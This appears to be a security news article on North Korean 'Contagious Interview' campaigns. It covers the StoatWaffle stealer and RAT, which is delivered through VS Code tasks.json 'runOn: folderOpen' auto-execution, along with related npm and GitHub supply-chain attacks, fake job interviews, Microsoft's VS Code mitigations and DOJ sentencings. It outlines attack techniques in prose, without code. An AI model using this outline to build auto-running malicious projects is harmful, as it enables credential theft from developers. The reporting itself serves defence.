North Korean Hackers Deploy StoatWaffle Malware Through Malicious VS Code Projects

The North Korean threat actors behind the Contagious Interview campaign, also known as WaterPlum, have been linked to a malware family called StoatWaffle, which is being distributed through malicious Microsoft Visual Studio Code (VS Code) projects.

Researchers say the attackers are using VS Code’s tasks.json feature in a relatively new way. Since December 2025, the group has been abusing the "runOn: folderOpen" option to automatically execute malicious tasks whenever a victim opens any file inside the infected project folder in VS Code.

According to NTT Security, the task is designed to download data from a web application hosted on Vercel, regardless of the operating system. Although the initial analysis focused on Windows, the core behavior is said to be similar across all platforms.

How the Malware Works

Once triggered, the downloaded payload first checks whether Node.js is installed on the victim’s machine. If it is not present, the malware downloads Node.js from the official website and installs it.

After that, it launches a downloader that repeatedly contacts an external server to fetch a second-stage downloader. This next-stage component behaves in a similar way, communicating with another endpoint on the same server and running the received response as Node.js code.

Researchers found that StoatWaffle can deploy two primary modules:

1. Stealer Module

The stealer is designed to collect:

  • Credentials stored in Chromium-based browsers
  • Data from Mozilla Firefox
  • Browser extension data
  • The iCloud Keychain database on macOS systems

This stolen information is then uploaded to a command-and-control server.

2. RAT Module

The second module functions as a remote access trojan (RAT). It communicates with the command-and-control server and can execute a range of commands on the infected machine. These include:

  • Changing the current working directory
  • Listing files and directories
  • Executing Node.js code
  • Uploading files
  • Searching directories recursively
  • Finding files containing specific keywords
  • Running shell commands
  • Terminating itself

Researchers described StoatWaffle as a modular malware family built with Node.js, with both stealer and RAT capabilities. They also noted that WaterPlum continues to actively refine and update its toolset.

Broader Campaigns Targeting Developers

The emergence of StoatWaffle comes alongside several other campaigns attributed to the same threat actor, many of which target the open-source ecosystem.

One campaign involved a set of malicious npm packages distributing PylangGhost, marking the first known case of that malware being spread through npm.

Another operation, called PolinRider, reportedly inserted obfuscated JavaScript payloads into hundreds of public GitHub repositories. This eventually led to the deployment of a newer version of BeaverTail, a known stealer and downloader associated with the Contagious Interview campaign.

Among the affected repositories were four belonging to the Neutralinojs GitHub organization. According to reports, the attackers compromised the GitHub account of a long-time contributor who had organization-level write access. They then force-pushed malicious JavaScript code that pulled encrypted payloads hidden in Tron, Aptos, and Binance Smart Chain transactions, ultimately downloading and running BeaverTail.

Researchers believe victims in this case may have been infected through either a malicious VS Code extension or an npm package.

Fake Job Interviews as the Entry Point

Microsoft recently said that the Contagious Interview campaign gains initial access by creating highly convincing fake recruitment processes that closely resemble legitimate technical interviews.

Victims are persuaded to run malicious commands or install harmful packages hosted on platforms such as GitHub, GitLab, and Bitbucket as part of coding assessments. In some cases, targets are first approached through LinkedIn.

The attackers are not mainly going after junior developers. Instead, researchers say they are selecting founders, CTOs, senior engineers, and professionals in the cryptocurrency and Web3 sectors, as these individuals are more likely to have privileged access to technical systems and cryptocurrency wallets.

One recent case involved an unsuccessful attempt to target the founder of AllSecure.io through a fake job interview.

Other Malware Families in the Same Attack Chain

Researchers say several malware families have been observed across these attack chains, including:

  • OtterCookie, a backdoor capable of large-scale data theft
  • InvisibleFerret, a Python-based backdoor
  • FlexibleFerret, a modular backdoor available in both Go and Python variants

InvisibleFerret has traditionally been delivered through BeaverTail, but more recent intrusions show it being deployed later in the chain after initial access is gained through OtterCookie.

FlexibleFerret is also known as WeaselStore, while its Go and Python variants are referred to as GolangGhost and PylangGhost.

Shift From Vercel to GitHub Gist

In a sign that the attackers are adjusting their methods, newer malicious VS Code projects have reportedly moved away from Vercel-hosted domains and now use GitHub Gist-hosted scripts to download and run follow-on payloads. These newer attacks ultimately lead to the deployment of FlexibleFerret and are also being staged on GitHub.

Microsoft warned that by embedding malware directly into coding exercises and interview tools, threat actors are exploiting the trust developers place in technical hiring workflows, especially during periods of urgency and pressure.

Microsoft Introduces New Protections in VS Code

In response to the abuse of VS Code Tasks, Microsoft introduced a mitigation in the January 2026 update (version 1.109). The update added a new setting called "task.allowAutomaticTasks", which is set to "off" by default to help prevent unintended execution of tasks defined in tasks.json when opening a workspace.

Microsoft also made sure this setting cannot be overridden at the workspace level through a repository’s own .vscode/settings.json file.

According to Abstract Security, the February 2026 update (version 1.110) added another safeguard by showing users a second warning prompt whenever an auto-run task is detected in a newly opened workspace. This acts as an extra layer of defense even after a user accepts the Workspace Trust prompt.

Ongoing North Korean Cyber Campaigns

In recent months, North Korean threat actors have also been linked to a coordinated malware campaign targeting cryptocurrency professionals through LinkedIn social engineering, fake venture capital firms, and fraudulent video conferencing links.

Researchers say this activity overlaps with clusters known as GhostCall and UNC1069. According to MacPaw’s Moonlock Lab, one of these attack chains ends in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their terminal.

The campaign is reportedly designed to work across both macOS and Windows, delivering tailored payloads depending on the victim’s operating system.

U.S. Department of Justice Announces Sentencing

The findings come as the U.S. Department of Justice announced the sentencing of three men — Audricus Phagnasay, Jason Salazar, and Alexander Paul Travis — for helping advance North Korea’s fraudulent IT worker scheme in violation of international sanctions.

All three had previously pleaded guilty in November 2025.

Phagnasay and Salazar were each sentenced to three years of probation and fined $2,000. They were also ordered to forfeit the illegal proceeds they earned through the wire fraud conspiracy.

Travis was sentenced to one year in prison and ordered to forfeit $193,265, the amount allegedly earned by North Koreans through the use of his identity.

Margaret Heap, U.S. Attorney for the Southern District of Georgia, said the men had effectively given North Korean technology workers the access they needed to generate illicit revenue for the North Korean government in exchange for what appeared to be easy money.

Conclusion

The discovery of StoatWaffle highlights how North Korean threat actors are continuing to evolve their tactics, especially by targeting developers through trusted platforms and workflows like VS Code, GitHub, and fake job interviews.

By combining social engineering with modular malware and open-source supply chain abuse, these groups are creating increasingly sophisticated campaigns aimed at individuals with elevated access to sensitive corporate systems and digital assets.